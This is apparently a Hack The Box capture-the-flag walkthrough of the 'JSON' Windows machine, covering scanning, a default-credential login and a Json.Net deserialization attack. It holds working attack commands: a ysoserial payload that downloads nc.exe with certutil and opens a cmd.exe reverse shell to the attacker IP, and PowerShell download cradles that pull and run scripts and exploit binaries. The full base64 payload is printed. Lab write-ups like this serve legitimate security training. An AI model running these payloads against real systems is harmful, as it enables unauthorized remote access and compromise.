Hack The Box: JSON Walkthrough

130n@calvinlai.com

Author:

fkclai is a Certified Ethical Hacker, Penetration Tester, Auditor and a Tech Enthusiast with more than 5 years of experience in the field of Application Security. Contact Here

@27 Nov 2019

Acknowledgement:

The game cannot be completed without the support of our friends of CTF Playgroup Hong Kong & Macau

Background:

Objective

Get the user.txt and root.txt

Penetrating Methodology:

Service Scanning

Nmap

Enumeration

Nikto
Dirb
Web browser

Exploitation

Ysoserial

Getting Less Privilege Shell

Sherlock
Windows-Exploit-Suggester

Walkthrough:

Target machine: 10.10.10.158

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.158. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap -p- 10.10.10.158

0.2) Details Analysis

nmap -sV -p 21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,49158 -A -oN nmap-htb-json-details.txt 10.10.10.158

PORT STATE SERVICE VERSION

21/tcp open ftp FileZilla ftpd

| ftp-syst:

|_ SYST: UNIX emulated by FileZilla

80/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: Json HTB

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

49152/tcp open msrpc Microsoft Windows RPC

49153/tcp open msrpc Microsoft Windows RPC

49154/tcp open msrpc Microsoft Windows RPC

49155/tcp open msrpc Microsoft Windows RPC

49156/tcp open msrpc Microsoft Windows RPC

49157/tcp open msrpc Microsoft Windows RPC

49158/tcp open msrpc Microsoft Windows RPC

Enumeration strategies

Check Website Vulnerability
Check any hidden files/folders of the website
Check the FTP port
Check the website

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto -- no vulnerability can be abused to bypass authentication.

1.2) Strategy 2 Check Hidden folder

Using dirb

Using gobuster

No hidden files/folders found for the exploitation.

1.3) Strategy 4 FTP

It does not allow anonymous login

1.4) Strategy 3 web page

Visit the web page

Using Json for the authorisation

Index.html

After several try if was found that the login credentials is admin/admin

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG…Sb2wiOiJBZG1pbmlzdHJhdG9yIn0=

{

"Id": 1,

"UserName": "admin",

"Password": "21232f297a57a5a743894a0e4a801fc3",

"Name": "User Admin HTB",

"Rol": "Administrator"

}

Hacking Process Part 2 – Exploitation

2.1) OAuth Token Exploitation

As the name implies that it should be related to the JSON attack. Try the ysoserial to prepare the exploit payload for the OAuth2 token.

Download the ysoserial tools

Download the master-release-29.zip and unzip the file

Prepare the strings to generate the payload

Switch off the window defender

Check how to save the file at target windows environment

ysoserial.exe -f Json.Net -g WindowsIdentity -o base64 -c "certutil.exe -urlcache -split -f "http://10.10.15.158:8888/nc.exe" "C:\windows\system32\spool\drivers\color\nc.exe"&"C:\windows\system32\spool\drivers\color\nc.exe" 10.10.15.158 1234 -e cmd.exe"

ew0KICAgICAgICAgICAgICAgICAgICAnJHR5cGUnOiAnU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsDQogICAgICAgICAgICAgICAgICAgICdTeXN0ZW0uU2VjdXJpdHkuQ2xhaW1zSWRlbnRpdHkuYm9vdHN0cmFwQ29udGV4dCc6ICdBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUVsVGVYTjBaVzBzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNUJRRUFBQUNFQVZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SFpXNWxjbWxqTGxOdmNuUmxaRk5sZEdBeFcxdFRlWE4wWlcwdVUzUnlhVzVuTENCdGMyTnZjbXhwWWl3Z1ZtVnljMmx2YmowMExqQXVNQzR3TENCRGRXeDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQV0kzTjJFMVl6VTJNVGt6TkdVd09EbGRYUVFBQUFBRlEyOTFiblFJUTI5dGNHRnlaWElIVm1WeWMybHZiZ1ZKZEdWdGN3QURBQVlJalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBJQWdBQUFBSUFBQUFKQXdBQUFBSUFBQUFKQkFBQUFBUURBQUFBalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBCQUFBQUMxOWpiMjF3WVhKcGMyOXVBeUpUZVhOMFpXMHVSR1ZzWldkaGRHVlRaWEpwWVd4cGVtRjBhVzl1U0c5c1pHVnlDUVVBQUFBUkJBQUFBQUlBQUFBR0JnQUFBTDRCTDJNZ1kyVnlkSFYwYVd3dVpYaGxJQzExY214allXTm9aU0F0YzNCc2FYUWdMV1lnYUhSMGNEb3ZMekV3TGpFd0xqRTFMakUxT0RvNE9EZzRMMjVqTG1WNFpTQkRPbHgzYVc1a2IzZHpYSE41YzNSbGJUTXlYSE53YjI5c1hHUnlhWFpsY25OY1kyOXNiM0pjYm1NdVpYaGxKa002WEhkcGJtUnZkM05jYzNsemRHVnRNekpjYzNCdmIyeGNaSEpwZG1WeWMxeGpiMnh2Y2x4dVl5NWxlR1VnTVRBdU1UQXVNVFV1TVRVNElERXlNelFnTFdVZ1kyMWtMbVY0WlFZSEFBQUFBMk50WkFRRkFBQUFJbE41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSURBQUFBQ0VSbGJHVm5ZWFJsQjIxbGRHaHZaREFIYldWMGFHOWtNUU1EQXpCVGVYTjBaVzB1UkdWc1pXZGhkR1ZUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5SzBSbGJHVm5ZWFJsUlc1MGNua3ZVM2x6ZEdWdExsSmxabXhsWTNScGIyNHVUV1Z0WW1WeVNXNW1iMU5sY21saGJHbDZZWFJwYjI1SWIyeGtaWEl2VTNsemRHVnRMbEpsWm14bFkzUnBiMjR1VFdWdFltVnlTVzVtYjFObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJSkNBQUFBQWtKQUFBQUNRb0FBQUFFQ0FBQUFEQlRlWE4wWlcwdVJHVnNaV2RoZEdWVFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUswUmxiR1ZuWVhSbFJXNTBjbmtIQUFBQUJIUjVjR1VJWVhOelpXMWliSGtHZEdGeVoyVjBFblJoY21kbGRGUjVjR1ZCYzNObGJXSnNlUTUwWVhKblpYUlVlWEJsVG1GdFpRcHRaWFJvYjJST1lXMWxEV1JsYkdWbllYUmxSVzUwY25rQkFRSUJBUUVETUZONWMzUmxiUzVFWld4bFoyRjBaVk5sY21saGJHbDZZWFJwYjI1SWIyeGtaWElyUkdWc1pXZGhkR1ZGYm5SeWVRWUxBQUFBc0FKVGVYTjBaVzB1Um5WdVkyQXpXMXRUZVhOMFpXMHVVM1J5YVc1bkxDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkTEZ0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZExGdFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN5d2dVM2x6ZEdWdExDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpjM1lUVmpOVFl4T1RNMFpUQTRPVjFkQmd3QUFBQkxiWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1Q2dZTkFBQUFTVk41YzNSbGJTd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGtHRGdBQUFCcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN3WVBBQUFBQlZOMFlYSjBDUkFBQUFBRUNRQUFBQzlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2djQUFBQUVUbUZ0WlF4QmMzTmxiV0pzZVU1aGJXVUpRMnhoYzNOT1lXMWxDVk5wWjI1aGRIVnlaUXBUYVdkdVlYUjFjbVV5Q2sxbGJXSmxjbFI1Y0dVUVIyVnVaWEpwWTBGeVozVnRaVzUwY3dFQkFRRUJBQU1JRFZONWMzUmxiUzVVZVhCbFcxMEpEd0FBQUFrTkFBQUFDUTRBQUFBR0ZBQUFBRDVUZVhOMFpXMHVSR2xoWjI1dmMzUnBZM011VUhKdlkyVnpjeUJUZEdGeWRDaFRlWE4wWlcwdVUzUnlhVzVuTENCVGVYTjBaVzB1VTNSeWFXNW5LUVlWQUFBQVBsTjVjM1JsYlM1RWFXRm5ibTl6ZEdsamN5NVFjbTlqWlhOeklGTjBZWEowS0ZONWMzUmxiUzVUZEhKcGJtY3NJRk41YzNSbGJTNVRkSEpwYm1jcENBQUFBQW9CQ2dBQUFBa0FBQUFHRmdBQUFBZERiMjF3WVhKbENRd0FBQUFHR0FBQUFBMVRlWE4wWlcwdVUzUnlhVzVuQmhrQUFBQXJTVzUwTXpJZ1EyOXRjR0Z5WlNoVGVYTjBaVzB1VTNSeWFXNW5MQ0JUZVhOMFpXMHVVM1J5YVc1bktRWWFBQUFBTWxONWMzUmxiUzVKYm5Rek1pQkRiMjF3WVhKbEtGTjVjM1JsYlM1VGRISnBibWNzSUZONWMzUmxiUzVUZEhKcGJtY3BDQUFBQUFvQkVBQUFBQWdBQUFBR0d3QUFBSEZUZVhOMFpXMHVRMjl0Y0dGeWFYTnZibUF4VzF0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhRa01BQUFBQ2drTUFBQUFDUmdBQUFBSkZnQUFBQW9MJw0KICAgICAgICAgICAgICAgIH0=

C) Prepare the netcat and http server for download the file from target server

Preparing the nc.exe for download

Hacking Process Part 3 – Getting Low Privilege Access

3.1) Login the website and exploit to get the low privilege access

Update the OAuth2 Cookie value and refresh

Get the Systeminfo and save for further evaluation

Searching the user.txt with the command dir user.txt /s /p

Hacking Process Part 4 - Privilege Escalation

4.1) Sherlock to find the vulnerability of the system

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

MS16-135 exploit-db

https://www.exploit-db.com/exploits/40823

Download the file to target

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/ASLRSideChannelAttack.exe' -OutFile 'C:\windows\system32\spool\drivers\color\ASLRSideChannelAttack.exe'"

Execute the ASLRSideChannelAttack.exe, it did not work.